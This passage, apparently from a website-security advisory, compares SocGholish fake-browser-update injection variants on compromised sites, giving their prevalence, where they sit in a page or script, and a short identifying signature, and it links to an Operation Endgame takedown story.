They are different SocGholish affiliate campaigns with distinct injection patterns. NDSW/NDSX is the most prevalent variant (110,000+ sites detected in 2023), found at the bottom of .js files with the signature if(ndsw===undefined). Khutmhpx (20,000+ sites) appears at the top of web pages and uses Keitaro TDS URLs for traffic distribution. All three variants deliver the same SocGholish fake browser update payload — the difference is in how the malicious code is injected and hidden. See the Injection Patterns section above for the full comparison table.
For the news story about the Operation Endgame Season 3 takedown that disrupted SocGholish infrastructure on June 18, 2026, read our Operation Endgame advisory: 14,971 WordPress Sites Cleaned in Global SocGholish Takedown.